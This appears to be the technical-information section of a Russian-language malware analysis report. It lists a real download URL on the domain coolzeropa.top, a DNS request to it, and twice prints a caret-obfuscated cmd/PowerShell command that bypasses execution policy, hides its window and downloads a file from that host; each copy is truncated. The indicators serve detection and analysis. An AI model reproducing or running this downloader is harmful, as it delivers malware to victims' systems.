Техническая информация
- http://coolzeropa.top/admin.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oWersheLl.e^XE ^-^E^X^EC^uT^iOnPo^liC^y b^yPaSs^ ^-^nO^P^RO^F^il^e ^-^wiN^dowStYl^e h^iDDEn ^(^N^ew^-^oBJ^eCT ^SYStEm.^nEt.wEBc^LIENt).^D^OWnLoAD^FIL^E^('http://coolzeropa....
- DNS ASK co###eropa.top
- '<SYSTEM32>\cmd.exe' /c "P^oWersheLl.e^XE ^-^E^X^EC^uT^iOnPo^liC^y b^yPaSs^ ^-^nO^P^RO^F^il^e ^-^wiN^dowStYl^e h^iDDEn ^(^N^ew^-^oBJ^eCT ^SYStEm.^nEt.wEBc^LIENt).^D^OWnLoAD^FIL^E^('http://coolzeropa....' (со скрытым окном)